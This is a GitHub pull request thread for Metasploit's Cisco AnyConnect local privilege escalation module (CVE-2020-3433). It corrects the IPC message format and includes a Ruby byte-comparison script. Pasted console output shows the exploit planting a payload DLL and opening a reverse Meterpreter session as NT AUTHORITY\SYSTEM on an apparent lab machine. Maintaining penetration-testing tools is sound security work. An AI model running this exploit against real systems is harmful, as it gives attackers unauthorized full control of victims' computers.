metasploit-framework
metasploit-framework copied to clipboard
rapid7
Fixed AnyConnect IPC message format:
- Made an error in the original research where the TLV had a type and a index, when it only has a type and a modifier that makes it into a TV (Type and Value, no Length).
- A TV has its value where the Length would be on a TLV.
- Also added a note on the endieness being correct/working because endieness has no impact in the message being used to exploit the vulnerability.
This PR is a small quality correction and doesn't add/remove any functionality.
Thanks! Do you have an example of the console output for this module still working? If so I should be able to get this landed shortly after :+1:
I don't have a lab set up for this; but just to verify things I compared the to_binary_s result for the before/after definitions and this looks good to me
require 'bindata'
class OldTlv < BinData::Record
# TLVs are tricky when it comes to endieness. For the type and length fields, they're big endian, but
# for the value, they're little endian. For example, each UTF-16 character, is encoded in one little
# endian unsigned short. There is one exception to that rule: UTF-8 strings and TV (Type and Value)
# entries. Note that TVs, are the ones that have a Type like 0x80XX, which are used to store some
# booleans and unsigned shorts.
# This is why having the entire "BinData::Record" as big endian is not a problem in this case: the IPC
# message to which the vulnerabilit(ies) are associated, only makes use of UTF-8 strings and a boolean.
endian :big
uint8 :msg_type, label: 'Type'
uint8 :msg_index, label: 'Index'
uint16 :msg_length, label: 'Length', initial_value: -> { msg_value.num_bytes }
stringz :msg_value, label: 'Value', length: -> { msg_length }
end
class NewTlv < BinData::Record
# TLVs are tricky when it comes to endieness. For the type and length fields, they're big endian, but
# for the value, they're little endian. For example, each UTF-16 character, is encoded in one little
# endian unsigned short. There is one exception to that rule: UTF-8 strings and TV (Type and Value)
# entries. Note that TVs, are the ones that have a Type like 0x80XX, which are used to store some
# booleans and unsigned shorts.
# This is why having the entire "BinData::Record" as big endian is not a problem in this case: the IPC
# message to which the vulnerabilit(ies) are associated, only makes use of UTF-8 strings and a boolean.
endian :big
uint16 :msg_type, label: 'Type'
uint16 :msg_length, label: 'Length', initial_value: -> { msg_value.num_bytes }
stringz :msg_value, label: 'Value', length: -> { msg_length }
end
old = OldTlv.new(
msg_type: 0,
msg_index: 2,
msg_value: 'hello world'
)
new = NewTlv.new(
msg_type: 2,
msg_value: 'hello world'
)
puts old.to_binary_s.bytes.inspect
puts new.to_binary_s.bytes.inspect
[0, 2, 0, 12, 104, 101, 108, 108, 111, 32, 119, 111, 114, 108, 100, 0]
[0, 2, 0, 12, 104, 101, 108, 108, 111, 32, 119, 111, 114, 108, 100, 0]
Release notes
Improves the CIPCTlv definition for the exploits/windows/local/anyconnect_lpe module
Sorry for the late answer, thanks for merging this @adfoster-r7. For future memory, follows the console output.
msf6 exploit(windows/local/anyconnect_lpe) > show options
Module options (exploit/windows/local/anyconnect_lpe):
Name Current Setting Required Description
---- --------------- -------- -----------
CVE CVE-2020-3433 yes Vulnerability to use (Accepted: CVE-2020-3433, CVE-2020-3153)
INSTALL_PATH no Cisco AnyConnect Secure Mobility Client installation path (where 'vpndownloader.exe' should be found). It will be aut
omatically detected if not set.
SESSION 1 yes The session to run this module on
Payload options (windows/meterpreter/reverse_http):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 192.168.98.129 yes The local listener hostname
LPORT 8444 yes The local listener port
LURI /m/32 no The HTTP Path
Exploit target:
Id Name
-- ----
0 Windows x86/x64 with x86 payload
View the full module info with the info, or info -d command.
msf6 exploit(windows/local/anyconnect_lpe) > show sessions
Active sessions
===============
Id Name Type Information Connection
-- ---- ---- ----------- ----------
1 meterpreter x86/windows DESKTOP-MADG1SD\tester001 @ DESKTOP-MADG1SD 192.168.98.129:8080 -> 192.168.98.128:49679 (192.168.98.128)
msf6 exploit(windows/local/anyconnect_lpe) > run
[*] Started HTTP reverse handler on http://192.168.98.129:8444/m/32
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Cisco AnyConnect version 4.8.3052.0.0 < 4.9.00086 (CVE-2020-3433).
[*] The target appears to be vulnerable. Cisco AnyConnect version 4.8.3052.0.0 < 4.9.00086 (CVE-2020-3433).
[*] Writing the payload to C:\Users\TESTER~1\AppData\Local\Temp\lw5SO3\dbghelp.dll
[!] http://192.168.98.129:8444/m/32 handling request from 192.168.98.128; (UUID: t7kd6pwm) Without a database connected that payload UUID tracking will not work!
[*] http://192.168.98.129:8444/m/32 handling request from 192.168.98.128; (UUID: t7kd6pwm) Staging x86 payload (176732 bytes) ...
[!] http://192.168.98.129:8444/m/32 handling request from 192.168.98.128; (UUID: t7kd6pwm) Without a database connected that payload UUID tracking will not work!
[+] Deleted C:\Users\TESTER~1\AppData\Local\Temp\lw5SO3\dbghelp.dll
[+] Deleted C:\Users\TESTER~1\AppData\Local\Temp\lw5SO3
[*] Meterpreter session 2 opened (192.168.98.129:8444 -> 192.168.98.128:49686) at 2023-02-01 16:56:54 +0000
meterpreter > sysinfo
Computer : DESKTOP-MADG1SD
OS : Windows 10 (10.0 Build 19045).
Architecture : x64
System Language : en_US
Domain : WORKGROUP
Logged On Users : 2
Meterpreter : x86/windows
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter >